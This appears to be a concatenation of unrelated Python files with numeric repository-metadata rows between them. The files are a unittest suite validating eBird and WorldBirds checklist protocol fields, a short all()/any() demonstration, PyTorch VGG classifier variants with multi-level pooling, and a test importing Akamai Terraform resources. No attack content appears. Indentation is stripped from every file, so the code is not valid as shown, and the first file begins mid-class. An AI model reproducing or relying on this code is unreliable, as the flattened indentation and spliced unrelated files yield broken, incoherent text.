"""Verify the protocol name has no extra whitespace."""
for protocol, source in self.protocols:
self.assertStripped(protocol['name'], msg=source)
class ProtocolTime(ValidationTestCase):
"""Validate the protocol time in the downloaded checklists."""
def setUp(self):
"""Initialize the test."""
self.protocols = [(checklist['protocol'], checklist['source'])
for checklist in checklists]
def test_name_type(self):
"""Verify the protocol name is a unicode string."""
for protocol, source in self.protocols:
self.assertIsInstance(protocol['time'], unicode, msg=source)
def test_name_format(self):
"""Verify the protocol name is set."""
for protocol, source in self.protocols:
self.assertRegexpMatches(protocol['time'], r'\d\d:\d\d', msg=source)
class ProtocolDuration(ValidationTestCase):
"""Validate the duration hours and minutes."""
def setUp(self):
"""Initialize the test."""
self.protocols = [(checklist['protocol'], checklist['source'])
for checklist in checklists
if checklist['protocol']['name'] == 'Traveling']
def test_duration_hours(self):
"""Verify the protocol duration in hours is an int."""
for protocol, source in self.protocols:
self.assertIsInstance(protocol['duration_hours'], int, msg=source)
def test_duration_minutes(self):
"""Verify the protocol duration in minutes is an int."""
for protocol, source in self.protocols:
self.assertIsInstance(protocol['duration_minutes'], int, msg=source)
class ProtocolDistance(ValidationTestCase):
"""Validate the distance covered."""
def setUp(self):
"""Initialize the test."""
self.protocols = [(checklist['protocol'], checklist['source'])
for checklist in checklists
if checklist['protocol']['name'] == 'Traveling']
def test_distance(self):
"""Verify the protocol duration in hours is an int."""
for protocol, source in self.protocols:
self.assertIsInstance(protocol['distance'], int, msg=source)
class ProtocolArea(ValidationTestCase):
"""Validate the area covered."""
def setUp(self):
"""Initialize the test."""
self.protocols = [(checklist['protocol'], checklist['source'])
for checklist in checklists
if checklist['protocol']['name'] == 'Area']
def test_area(self):
"""Verify the protocol duration in hours is an int."""
for protocol, source in self.protocols:
self.assertIsInstance(protocol['area'], int, msg=source)
class EbirdProtocolName(ValidationTestCase):
"""Validate the protocol names in the downloaded checklists from ebird."""
def setUp(self):
"""Initialize the test."""
self.protocols = [(checklist['protocol'], checklist['source'])
for checklist in checklists
if checklist['source'] == 'ebird']
def test_expected_names(self):
"""Verify the protocol name is expected.
This compares the protocol name against the list on ebird.org as of
2013-06-25 and alerts to any changes.
"""
expected = ['Traveling', 'Stationary', 'Incidental', 'Area', 'Random',
'Oiled Birds', 'Nocturnal Flight Call Count',
'Greater Gulf Refuge Waterbird Count',
'Heron Area Count', 'Heron Stationary Count']
for protocol, source in self.protocols:
self.assertTrue(protocol['name'] in expected, msg=source)
class EbirdTravelingProtocol(ValidationTestCase):
"""Validate the fields set in the Traveling protocol from ebird."""
def setUp(self):
"""Initialize the test."""
self.protocols = [(checklist['protocol'], checklist['source'])
for checklist in checklists
if checklist['source'] == 'ebird' and
checklist['protocol']['name'] == 'Traveling']
def test_time_set(self):
"""Verify the time is set for the Traveling protocol."""
for protocol, source in self.protocols:
self.assertTrue(protocol['time'], msg=source)
def test_duration_set(self):
"""Verify the time is set for the Traveling protocol."""
for protocol, source in self.protocols:
self.assertTrue(protocol['duration_hours'] or
protocol['duration_minutes'], msg=source)
def test_distance_set(self):
"""Verify the distance is set for the Traveling protocol."""
for protocol, source in self.protocols:
self.assertTrue(protocol['distance'], msg=source)
def test_area_clear(self):
"""Verify the area is not set for the Traveling protocol."""
for protocol, source in self.protocols:
self.assertEqual(0, protocol['area'], msg=source)
class EbirdStationaryProtocol(ValidationTestCase):
"""Validate the fields set in the Stationary protocol from ebird."""
def setUp(self):
"""Initialize the test."""
self.protocols = [(checklist['protocol'], checklist['source'])
for checklist in checklists
if checklist['source'] == 'ebird' and
checklist['protocol']['name'] == 'Stationary']
def test_time_set(self):
"""Verify the time is set for the Traveling protocol."""
for protocol, source in self.protocols:
self.assertTrue(protocol['time'], msg=source)
def test_duration_set(self):
"""Verify the time is set for the Traveling protocol."""
for protocol, source in self.protocols:
self.assertTrue(protocol['duration_hours'] or
protocol['duration_minutes'], msg=source)
def test_distance_clear(self):
"""Verify the distance is not set for the Stationary protocol."""
for protocol, source in self.protocols:
self.assertEqual(0, protocol['distance'], msg=source)
def test_area_clear(self):
"""Verify the area is not set for the Stationary protocol."""
for protocol, source in self.protocols:
self.assertEqual(0, protocol['area'], msg=source)
class EbirdAreaProtocol(ValidationTestCase):
"""Validate the fields set in the Area protocol from ebird."""
def setUp(self):
"""Initialize the test."""
self.protocols = [(checklist['protocol'], checklist['source'])
for checklist in checklists
if checklist['source'] == 'ebird' and
checklist['protocol']['name'] == 'Area']
def test_time_set(self):
"""Verify the time is set for the Area protocol."""
for protocol, source in self.protocols:
self.assertTrue(protocol['time'], msg=source)
def test_duration_set(self):
"""Verify the time is set for the Area protocol."""
for protocol, source in self.protocols:
self.assertTrue(protocol['duration_hours'] or
protocol['duration_minutes'], msg=source)
def test_distance_clear(self):
"""Verify the distance is not set for the Area protocol."""
for protocol, source in self.protocols:
self.assertEqual(0, protocol['distance'], msg=source)
def test_area_set(self):
"""Verify the area is set for the Area protocol."""
for protocol, source in self.protocols:
self.assertTrue(protocol['area'], msg=source)
class EbirdRandomProtocol(ValidationTestCase):
"""Validate the fields set in the Random protocol from ebird."""
def setUp(self):
"""Initialize the test."""
self.protocols = [(checklist['protocol'], checklist['source'])
for checklist in checklists
if checklist['source'] == 'ebird' and
checklist['protocol']['name'] == 'Random']
def test_time_set(self):
"""Verify the time is set for the Random protocol."""
for protocol, source in self.protocols:
self.assertTrue(protocol['time'], msg=source)
def test_duration_set(self):
"""Verify the time is set for the Random protocol."""
for protocol, source in self.protocols:
self.assertTrue(protocol['duration_hours'] or
protocol['duration_minutes'], msg=source)
def test_distance_set(self):
"""Verify the distance is set for the Random protocol."""
for protocol, source in self.protocols:
self.assertTrue(protocol['distance'], msg=source)
def test_area_clear(self):
"""Verify the area is not set for the Random protocol."""
for protocol, source in self.protocols:
self.assertEqual(0, protocol['area'], msg=source)
class EbirdIncidentalProtocol(ValidationTestCase):
"""Validate the fields set in the Incidental protocol from ebird."""
def setUp(self):
"""Initialize the test."""
self.protocols = [(checklist['protocol'], checklist['source'])
for checklist in checklists
if checklist['source'] == 'ebird' and
checklist['protocol']['name'] == 'Incidental']
def test_time_set(self):
"""Verify the time is set for the Incidental protocol."""
for protocol, source in self.protocols:
self.assertTrue(protocol['time'], msg=source)
def test_duration_hours_clear(self):
"""Verify duration in hours is not set for the Incidental protocol."""
for protocol, source in self.protocols:
self.assertEqual(0, protocol['duration_hours'], msg=source)
def test_duration_minutes_clear(self):
"""Verify duration in minutesis not set for the Incidental protocol."""
for protocol, source in self.protocols:
self.assertEqual(0, protocol['duration_minutes'], msg=source)
def test_distance_clear(self):
"""Verify the distance is not set for the Incidental protocol."""
for protocol, source in self.protocols:
self.assertEqual(0, protocol['distance'], msg=source)
def test_area_clear(self):
"""Verify the area is not set for the Incidental protocol."""
for protocol, source in self.protocols:
self.assertEqual(0, protocol['area'], msg=source)
class WorldBirdsProtocolName(ValidationTestCase):
"""Validate the protocol names in the downloaded checklists from ebird."""
def setUp(self):
"""Initialize the test."""
self.protocols = [(checklist['protocol'], checklist['source'])
for checklist in checklists
if checklist['source'] == 'worldbirds']
def test_expected_names(self):
"""Verify the protocol name is expected.
WorldBirds does not define a specific protocol. However start time
and duration spent counting are defined so a default protocol name
of "Timed visit" is used.
"""
for protocol, source in self.protocols:
self.assertEqual(protocol['name'], 'Timed visit', msg=source)
class WorldBirdsTimedVisitProtocol(ValidationTestCase):
"""Validate the fields set in the Time visits protocol from WorldBirds."""
def setUp(self):
"""Initialize the test."""
self.protocols = [(checklist['protocol'], checklist['source'])
for checklist in checklists
if checklist['source'] == 'worldbirds' and
checklist['protocol']['name'] == 'Timed visit']
def test_time_set(self):
"""Verify the time is set for the Timed visit protocol."""
for protocol, source in self.protocols:
self.assertTrue(protocol['time'], msg=source)
def test_duration_set(self):
"""Verify the time is set for the Timed visit protocol."""
for protocol, source in self.protocols:
self.assertTrue(protocol['duration_hours'] or
protocol['duration_minutes'], msg=source)
def test_distance_clear(self):
"""Verify the distance is not set for the Timed visit protocol."""
for protocol, source in self.protocols:
self.assertEqual(0, protocol['distance'], msg=source)
def test_area_clear(self):
"""Verify the area is not set for the Timed visit protocol."""
for protocol, source in self.protocols:
self.assertEqual(0, protocol['area'], msg=source)
| 39.092105 | 80 | 0.618041 | 1,652 | 14,855 | 5.503632 | 0.08293 | 0.072921 | 0.069182 | 0.077321 | 0.794325 | 0.780026 | 0.755279 | 0.722943 | 0.717774 | 0.711175 | 0 | 0.002875 | 0.274184 | 14,855 | 379 | 81 | 39.195251 | 0.840382 | 0.265029 | 0 | 0.716495 | 0 | 0 | 0.094035 | 0 | 0 | 0 | 0 | 0 | 0.190722 | 1 | 0.262887 | false | 0 | 0.005155 | 0 | 0.340206 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
70208a4e610dbd4428a820c1c9d59bf7411d1ba4 | 469 | py | Python | notebook/all_any_comprehension.py | vhn0912/python-snippets | 80b2e1d6b2b8f12ae30d6dbe86d25bb2b3a02038 | [
"MIT"
] | 174 | 2018-05-30T21:14:50.000Z | 2022-03-25T07:59:37.000Z | notebook/all_any_comprehension.py | vhn0912/python-snippets | 80b2e1d6b2b8f12ae30d6dbe86d25bb2b3a02038 | [
"MIT"
] | 5 | 2019-08-10T03:22:02.000Z | 2021-07-12T20:31:17.000Z | notebook/all_any_comprehension.py | vhn0912/python-snippets | 80b2e1d6b2b8f12ae30d6dbe86d25bb2b3a02038 | [
"MIT"
] | 53 | 2018-04-27T05:26:35.000Z | 2022-03-25T07:59:37.000Z | l = [0, 1, 2, 3, 4]
print([i > 2 for i in l])
# [False, False, False, True, True]
print(all([i > 2 for i in l]))
# False
print(any([i > 2 for i in l]))
# True
print(type([i > 2 for i in l]))
# <class 'list'>
print(type((i > 2 for i in l)))
# <class 'generator'>
print(type(i > 2 for i in l))
# <class 'generator'>
print(all(i > 2 for i in l))
# False
print(any(i > 2 for i in l))
# True
print(sum(i > 2 for i in l))
# 2
print(sum(not (i > 2) for i in l))
# 3
| 14.65625 | 35 | 0.552239 | 103 | 469 | 2.514563 | 0.194175 | 0.07722 | 0.19305 | 0.23166 | 0.810811 | 0.810811 | 0.741313 | 0.687259 | 0.687259 | 0.617761 | 0 | 0.048023 | 0.245203 | 469 | 31 | 36 | 15.129032 | 0.683616 | 0.24307 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.909091 | 0 | 0 | 0 | null | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 7 |
702622acf81a6b04c7b0d22214f566968b2ac4a8 | 12,807 | py | Python | model/vgg_hgap.py | haifangong/SYSU-HCP-at-ImageCLEF-VQA-Med-2021 | 78b4ea80d21938f2c5ca07df071e776a13fe5fb1 | [
"MIT"
] | 3 | 2021-05-19T15:42:12.000Z | 2022-03-30T08:00:51.000Z | model/vgg_hgap.py | Rodger-Huang/SYSU-HCP-at-ImageCLEF-VQA-Med-2021 | 78b4ea80d21938f2c5ca07df071e776a13fe5fb1 | [
"MIT"
] | null | null | null | model/vgg_hgap.py | Rodger-Huang/SYSU-HCP-at-ImageCLEF-VQA-Med-2021 | 78b4ea80d21938f2c5ca07df071e776a13fe5fb1 | [
"MIT"
] | 1 | 2021-10-16T09:09:58.000Z | 2021-10-16T09:09:58.000Z | import torch
import torch.nn as nn
import torchvision
import os, sys
sys.path.append(os.path.join(os.path.dirname(os.path.abspath(__file__)), '..'))
from utils import LSoftmaxLinear
from utils import AngleLinear
from block.NonLocal import NonLocalBlock
from block.resizerNetwork import ResizerNetwork
class vgg16HGap(nn.Module):
def __init__(self, pretrained=True, num_classes=330, rank=None, margin=None):
super(vgg16HGap, self).__init__()
self.vgg = torchvision.models.vgg16(pretrained=pretrained).features
self.model_list = list(self.vgg.children())
self.conv1 = nn.Sequential(*self.model_list[0:4])
self.conv2 = nn.Sequential(*self.model_list[4:9])
self.conv3 = nn.Sequential(*self.model_list[9:16])
self.conv4 = nn.Sequential(*self.model_list[16:23])
self.conv5 = nn.Sequential(*self.model_list[23:30])
self.conv6 = nn.Sequential(self.model_list[30])
self.pool1 = nn.AdaptiveAvgPool2d(1)
self.pool2 = nn.AdaptiveAvgPool2d(1)
self.pool3 = nn.AdaptiveAvgPool2d(1)
self.pool4 = nn.AdaptiveAvgPool2d(1)
self.pool5 = nn.AdaptiveAvgPool2d(1)
self.pool6 = nn.AdaptiveAvgPool2d(1)
self.classifier = nn.Linear(1984, num_classes)
# self.lsoftmax_linear = LSoftmaxLinear(
# input_features=1984, output_features=num_classes, margin=margin, device=rank)
# self.asoftmax = AngleLinear(1984, num_classes, m=margin)
def forward(self, x, targeta=None, targetb=None):
y1 = self.conv1(x)
p1 = self.pool1(y1)
y2 = self.conv2(y1)
p2 = self.pool2(y2)
y3 = self.conv3(y2)
p3 = self.pool3(y3)
y4 = self.conv4(y3)
p4 = self.pool4(y4)
y5 = self.conv5(y4)
p5 = self.pool5(y5)
y6 = self.conv6(y5)
p6 = self.pool6(y6)
f = torch.cat([p1, p2, p3, p4, p5, p6], 1).squeeze(3).squeeze(2)
return self.classifier(f)
# if self.training:
# outa = self.lsoftmax_linear(input=f, target=targeta)
# outb = self.lsoftmax_linear(input=f, target=targetb)
# return outa, outb
# else:
# return self.lsoftmax_linear(input=f)
# return self.asoftmax(f)
class vgg16HGap_bn(nn.Module):
def __init__(self, pretrained=True, num_classes=330):
super(vgg16HGap_bn, self).__init__()
self.vgg = torchvision.models.vgg16_bn(pretrained=pretrained).features
self.model_list = list(self.vgg.children())
self.conv1 = nn.Sequential(*self.model_list[0:6])
self.conv2 = nn.Sequential(*self.model_list[6:13])
self.conv3 = nn.Sequential(*self.model_list[13:23])
self.conv4 = nn.Sequential(*self.model_list[23:33])
self.conv5 = nn.Sequential(*self.model_list[33:43])
self.conv6 = nn.Sequential(self.model_list[43])
self.pool1 = nn.AvgPool2d(224)
self.pool2 = nn.AvgPool2d(112)
self.pool3 = nn.AvgPool2d(56)
self.pool4 = nn.AvgPool2d(28)
self.pool5 = nn.AvgPool2d(14)
self.pool6 = nn.AvgPool2d(7)
self.classifier = nn.Linear(1984, num_classes)
def forward(self, x):
y1 = self.conv1(x)
p1 = self.pool1(y1)
y2 = self.conv2(y1)
p2 = self.pool2(y2)
y3 = self.conv3(y2)
p3 = self.pool3(y3)
y4 = self.conv4(y3)
p4 = self.pool4(y4)
y5 = self.conv5(y4)
p5 = self.pool5(y5)
y6 = self.conv6(y5)
p6 = self.pool6(y6)
out = torch.cat([p1,p2,p3,p4,p5,p6], 1).squeeze(3)
out = out.squeeze(2)
out = self.classifier(out)
return out
class vgg16_multi_scales(nn.Module):
def __init__(self, pretrained=True, num_classes=330):
super(vgg16_multi_scales, self).__init__()
self.vgg = torchvision.models.vgg16(pretrained=pretrained).features
self.model_list = list(self.vgg.children())
self.conv1 = nn.Sequential(*self.model_list[0:4])
self.conv2 = nn.Sequential(*self.model_list[4:9])
self.conv3 = nn.Sequential(*self.model_list[9:16])
self.conv4 = nn.Sequential(*self.model_list[16:23])
self.conv5 = nn.Sequential(*self.model_list[23:30])
self.conv6 = nn.Sequential(self.model_list[30])
self.pool1 = nn.AdaptiveAvgPool2d(1)
self.pool2 = nn.AdaptiveAvgPool2d(1)
self.pool3 = nn.AdaptiveAvgPool2d(1)
self.pool4 = nn.AdaptiveAvgPool2d(1)
self.pool5 = nn.AdaptiveAvgPool2d(1)
self.pool6 = nn.AdaptiveAvgPool2d(1)
self.fc1 = nn.Linear(256, num_classes)
self.fc2 = nn.Linear(512, num_classes)
self.fc3 = nn.Linear(512, num_classes)
self.fc4 = nn.Linear(512, num_classes)
def forward(self, x):
y1 = self.conv1(x)
p1 = self.pool1(y1)
y2 = self.conv2(y1)
p2 = self.pool2(y2)
y3 = self.conv3(y2)
p3 = self.pool3(y3)
y4 = self.conv4(y3)
p4 = self.pool4(y4)
y5 = self.conv5(y4)
p5 = self.pool5(y5)
y6 = self.conv6(y5)
p6 = self.pool6(y6)
out1 = p3.squeeze(3).squeeze(2)
out1 = self.fc1(out1)
out2 = p4.squeeze(3).squeeze(2)
out2 = self.fc2(out2)
out3 = p5.squeeze(3).squeeze(2)
out3 = self.fc3(out3)
out4 = p6.squeeze(3).squeeze(2)
out4 = self.fc4(out4)
if self.training:
return [out1, out2, out3, out4]
else:
return out4
class vgg16_add(nn.Module):
def __init__(self, pretrained=True, num_classes=330):
super(vgg16_add, self).__init__()
self.vgg = torchvision.models.vgg16(pretrained=pretrained).features
self.model_list = list(self.vgg.children())
self.conv1 = nn.Sequential(*self.model_list[0:4])
self.conv2 = nn.Sequential(*self.model_list[4:9])
self.conv3 = nn.Sequential(*self.model_list[9:16])
self.conv4 = nn.Sequential(*self.model_list[16:23])
self.conv5 = nn.Sequential(*self.model_list[23:30])
self.conv6 = nn.Sequential(self.model_list[30])
self.pool1 = nn.AdaptiveAvgPool2d(1)
self.pool2 = nn.AdaptiveAvgPool2d(1)
self.pool3 = nn.AdaptiveAvgPool2d(1)
self.pool4 = nn.AdaptiveAvgPool2d(1)
self.pool5 = nn.AdaptiveAvgPool2d(1)
self.pool6 = nn.AdaptiveAvgPool2d(1)
self.fc1 = nn.Linear(256, num_classes)
self.fc2 = nn.Linear(512, num_classes)
self.fc3 = nn.Linear(512, num_classes)
self.fc4 = nn.Linear(512, num_classes)
def forward(self, x):
y1 = self.conv1(x)
p1 = self.pool1(y1)
y2 = self.conv2(y1)
p2 = self.pool2(y2)
y3 = self.conv3(y2)
p3 = self.pool3(y3)
y4 = self.conv4(y3)
p4 = self.pool4(y4)
y5 = self.conv5(y4)
p5 = self.pool5(y5)
y6 = self.conv6(y5)
p6 = self.pool6(y6)
out1 = p3.squeeze(3).squeeze(2)
out1 = self.fc1(out1)
out2 = p4.squeeze(3).squeeze(2)
out2 = self.fc2(out2)
out3 = p5.squeeze(3).squeeze(2)
out3 = self.fc3(out3)
out4 = p6.squeeze(3).squeeze(2)
out4 = self.fc4(out4)
return out1 + out2 + out3 + out4
class vgg19HGap(nn.Module):
def __init__(self, pretrained=True, num_classes=330):
super(vgg19HGap, self).__init__()
self.vgg = torchvision.models.vgg19(pretrained=pretrained).features
self.model_list = list(self.vgg.children())
self.conv1 = nn.Sequential(*self.model_list[0:4])
self.conv2 = nn.Sequential(*self.model_list[4:9])
self.conv3 = nn.Sequential(*self.model_list[9:18])
self.conv4 = nn.Sequential(*self.model_list[18:27])
self.conv5 = nn.Sequential(*self.model_list[27:36])
self.conv6 = nn.Sequential(self.model_list[36])
self.pool1 = nn.AvgPool2d(224)
self.pool2 = nn.AvgPool2d(112)
self.pool3 = nn.AvgPool2d(56)
self.pool4 = nn.AvgPool2d(28)
self.pool5 = nn.AvgPool2d(14)
self.pool6 = nn.AvgPool2d(7)
self.classifier = nn.Linear(1984, num_classes)
def forward(self, x):
y1 = self.conv1(x)
p1 = self.pool1(y1)
y2 = self.conv2(y1)
p2 = self.pool2(y2)
y3 = self.conv3(y2)
p3 = self.pool3(y3)
y4 = self.conv4(y3)
p4 = self.pool4(y4)
y5 = self.conv5(y4)
p5 = self.pool5(y5)
y6 = self.conv6(y5)
p6 = self.pool6(y6)
out = torch.cat([p1,p2,p3,p4,p5,p6],1).squeeze(3)
out = out.squeeze(2)
out = self.classifier(out)
return out
class vgg16NonLocal(nn.Module):
def __init__(self, pretrained=True, num_classes=330, rank=None, margin=None):
super(vgg16NonLocal, self).__init__()
self.vgg = torchvision.models.vgg16(pretrained=pretrained).features
self.model_list = list(self.vgg.children())
self.conv1 = nn.Sequential(*self.model_list[0:4])
self.conv2 = nn.Sequential(*self.model_list[4:9])
self.conv3 = nn.Sequential(*self.model_list[9:16])
self.conv4 = nn.Sequential(*self.model_list[16:23])
self.conv5 = nn.Sequential(*self.model_list[23:30])
self.conv6 = nn.Sequential(self.model_list[30])
self.pool1 = nn.AvgPool2d(224)
self.pool2 = nn.AvgPool2d(112)
self.pool3 = nn.AvgPool2d(56)
self.pool4 = nn.AvgPool2d(28)
self.pool5 = nn.AvgPool2d(14)
self.pool6 = nn.AvgPool2d(7)
self.non4 = NonLocalBlock(512)
self.non5 = NonLocalBlock(512)
self.non6 = NonLocalBlock(512)
self.classifier = nn.Linear(1984, num_classes)
def forward(self, x, targeta=None, targetb=None):
y1 = self.conv1(x)
p1 = self.pool1(y1)
y2 = self.conv2(y1)
p2 = self.pool2(y2)
y3 = self.conv3(y2)
p3 = self.pool3(y3)
y4 = self.conv4(y3)
y4 = self.non4(y4)
p4 = self.pool4(y4)
y5 = self.conv5(y4)
y5= self.non5(y5)
p5 = self.pool5(y5)
y6 = self.conv6(y5)
y6 = self.non6(y6)
p6 = self.pool6(y6)
f = torch.cat([p1, p2, p3, p4, p5, p6], 1).squeeze(3).squeeze(2)
return self.classifier(f)
class vgg16HGap_resizer(nn.Module):
def __init__(self, pretrained=True, num_classes=330, rank=None, margin=None, output_size=(224, 224), num_residuals=1):
super(vgg16HGap_resizer, self).__init__()
self.resizer = ResizerNetwork(output_size=output_size, num_residuals=num_residuals)
self.vgg = torchvision.models.vgg16(pretrained=pretrained).features
self.model_list = list(self.vgg.children())
self.conv1 = nn.Sequential(*self.model_list[0:4])
self.conv2 = nn.Sequential(*self.model_list[4:9])
self.conv3 = nn.Sequential(*self.model_list[9:16])
self.conv4 = nn.Sequential(*self.model_list[16:23])
self.conv5 = nn.Sequential(*self.model_list[23:30])
self.conv6 = nn.Sequential(self.model_list[30])
self.pool1 = nn.AvgPool2d(224)
self.pool2 = nn.AvgPool2d(112)
self.pool3 = nn.AvgPool2d(56)
self.pool4 = nn.AvgPool2d(28)
self.pool5 = nn.AvgPool2d(14)
self.pool6 = nn.AvgPool2d(7)
self.classifier = nn.Linear(1984, num_classes)
def forward(self, x):
x = self.resizer(x)
y1 = self.conv1(x)
p1 = self.pool1(y1)
y2 = self.conv2(y1)
p2 = self.pool2(y2)
y3 = self.conv3(y2)
p3 = self.pool3(y3)
y4 = self.conv4(y3)
p4 = self.pool4(y4)
y5 = self.conv5(y4)
p5 = self.pool5(y5)
y6 = self.conv6(y5)
p6 = self.pool6(y6)
f = torch.cat([p1, p2, p3, p4, p5, p6], 1).squeeze(3).squeeze(2)
return self.classifier(f)
if __name__ == '__main__':
model = vgg16HGap_resizer(pretrained=True)
model(torch.rand(2, 3, 512, 512))
| 35.184066 | 123 | 0.563832 | 1,638 | 12,807 | 4.308913 | 0.086691 | 0.062482 | 0.090252 | 0.124965 | 0.859309 | 0.849674 | 0.836356 | 0.788042 | 0.780674 | 0.780674 | 0 | 0.093859 | 0.30702 | 12,807 | 363 | 124 | 35.280992 | 0.701408 | 0.031389 | 0 | 0.81295 | 0 | 0 | 0.000831 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.05036 | false | 0 | 0.028777 | 0 | 0.133094 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
70281e15493ddcdd17d4b089286fe0eb290ca0ea | 16 | py | Python | src/cmcandy/Python_language_Answers/dc-3.py | ch98road/leetcode | a9b4be54a169b30f6711809b892dd1f79f2a17e7 | [
"MIT"
] | null | null | null | src/cmcandy/Python_language_Answers/dc-3.py | ch98road/leetcode | a9b4be54a169b30f6711809b892dd1f79f2a17e7 | [
"MIT"
] | null | null | null | src/cmcandy/Python_language_Answers/dc-3.py | ch98road/leetcode | a9b4be54a169b30f6711809b892dd1f79f2a17e7 | [
"MIT"
] | 1 | 2020-11-26T03:01:12.000Z | 2020-11-26T03:01:12.000Z | # 123 345 -10123 | 16 | 16 | 0.6875 | 3 | 16 | 3.666667 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.846154 | 0.1875 | 16 | 1 | 16 | 16 | 0 | 0.875 | 0 | null | 0 | null | 0 | 0 | null | 0 | 0 | 0 | null | 1 | null | true | 0 | 0 | null | null | null | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
703947eb23fe338c9e537c97c02d39d40ed5f7a9 | 10,973 | py | Python | tests/test_provider_akamai_akamai.py | mjuenema/python-terrascript | 6d8bb0273a14bfeb8ff8e950fe36f97f7c6e7b1d | [
"BSD-2-Clause"
] | 507 | 2017-07-26T02:58:38.000Z | 2022-01-21T12:35:13.000Z | tests/test_provider_akamai_akamai.py | mjuenema/python-terrascript | 6d8bb0273a14bfeb8ff8e950fe36f97f7c6e7b1d | [
"BSD-2-Clause"
] | 135 | 2017-07-20T12:01:59.000Z | 2021-10-04T22:25:40.000Z | tests/test_provider_akamai_akamai.py | mjuenema/python-terrascript | 6d8bb0273a14bfeb8ff8e950fe36f97f7c6e7b1d | [
"BSD-2-Clause"
] | 81 | 2018-02-20T17:55:28.000Z | 2022-01-31T07:08:40.000Z | # tests/test_provider_akamai_akamai.py
# Automatically generated by tools/makecode.py (24-Sep-2021 15:11:11 UTC)
def test_provider_import():
import terrascript.provider.akamai.akamai
def test_resource_import():
from terrascript.resource.akamai.akamai import akamai_appsec_activations
from terrascript.resource.akamai.akamai import (
akamai_appsec_advanced_settings_logging,
)
from terrascript.resource.akamai.akamai import (
akamai_appsec_advanced_settings_pragma_header,
)
from terrascript.resource.akamai.akamai import (
akamai_appsec_advanced_settings_prefetch,
)
from terrascript.resource.akamai.akamai import (
akamai_appsec_api_constraints_protection,
)
from terrascript.resource.akamai.akamai import akamai_appsec_api_request_constraints
from terrascript.resource.akamai.akamai import akamai_appsec_attack_group
from terrascript.resource.akamai.akamai import akamai_appsec_bypass_network_lists
from terrascript.resource.akamai.akamai import akamai_appsec_configuration
from terrascript.resource.akamai.akamai import akamai_appsec_configuration_rename
from terrascript.resource.akamai.akamai import akamai_appsec_custom_deny
from terrascript.resource.akamai.akamai import akamai_appsec_custom_rule
from terrascript.resource.akamai.akamai import akamai_appsec_custom_rule_action
from terrascript.resource.akamai.akamai import akamai_appsec_eval
from terrascript.resource.akamai.akamai import akamai_appsec_eval_group
from terrascript.resource.akamai.akamai import akamai_appsec_eval_hostnames
from terrascript.resource.akamai.akamai import akamai_appsec_eval_protect_host
from terrascript.resource.akamai.akamai import akamai_appsec_eval_rule
from terrascript.resource.akamai.akamai import akamai_appsec_ip_geo
from terrascript.resource.akamai.akamai import akamai_appsec_ip_geo_protection
from terrascript.resource.akamai.akamai import akamai_appsec_match_target
from terrascript.resource.akamai.akamai import akamai_appsec_match_target_sequence
from terrascript.resource.akamai.akamai import akamai_appsec_penalty_box
from terrascript.resource.akamai.akamai import akamai_appsec_rate_policy
from terrascript.resource.akamai.akamai import akamai_appsec_rate_policy_action
from terrascript.resource.akamai.akamai import akamai_appsec_rate_protection
from terrascript.resource.akamai.akamai import akamai_appsec_reputation_profile
from terrascript.resource.akamai.akamai import (
akamai_appsec_reputation_profile_action,
)
from terrascript.resource.akamai.akamai import (
akamai_appsec_reputation_profile_analysis,
)
from terrascript.resource.akamai.akamai import akamai_appsec_reputation_protection
from terrascript.resource.akamai.akamai import akamai_appsec_rule
from terrascript.resource.akamai.akamai import akamai_appsec_rule_upgrade
from terrascript.resource.akamai.akamai import akamai_appsec_security_policy
from terrascript.resource.akamai.akamai import akamai_appsec_security_policy_rename
from terrascript.resource.akamai.akamai import akamai_appsec_selected_hostnames
from terrascript.resource.akamai.akamai import akamai_appsec_siem_settings
from terrascript.resource.akamai.akamai import akamai_appsec_slow_post
from terrascript.resource.akamai.akamai import akamai_appsec_slowpost_protection
from terrascript.resource.akamai.akamai import akamai_appsec_threat_intel
from terrascript.resource.akamai.akamai import akamai_appsec_version_notes
from terrascript.resource.akamai.akamai import akamai_appsec_waf_mode
from terrascript.resource.akamai.akamai import akamai_appsec_waf_protection
from terrascript.resource.akamai.akamai import akamai_appsec_wap_selected_hostnames
from terrascript.resource.akamai.akamai import akamai_cp_code
from terrascript.resource.akamai.akamai import akamai_cps_dv_enrollment
from terrascript.resource.akamai.akamai import akamai_cps_dv_validation
from terrascript.resource.akamai.akamai import akamai_dns_record
from terrascript.resource.akamai.akamai import akamai_dns_zone
from terrascript.resource.akamai.akamai import akamai_edge_hostname
from terrascript.resource.akamai.akamai import akamai_gtm_asmap
from terrascript.resource.akamai.akamai import akamai_gtm_cidrmap
from terrascript.resource.akamai.akamai import akamai_gtm_datacenter
from terrascript.resource.akamai.akamai import akamai_gtm_domain
from terrascript.resource.akamai.akamai import akamai_gtm_geomap
from terrascript.resource.akamai.akamai import akamai_gtm_property
from terrascript.resource.akamai.akamai import akamai_gtm_resource
from terrascript.resource.akamai.akamai import akamai_iam_user
from terrascript.resource.akamai.akamai import akamai_networklist_activations
from terrascript.resource.akamai.akamai import akamai_networklist_description
from terrascript.resource.akamai.akamai import akamai_networklist_network_list
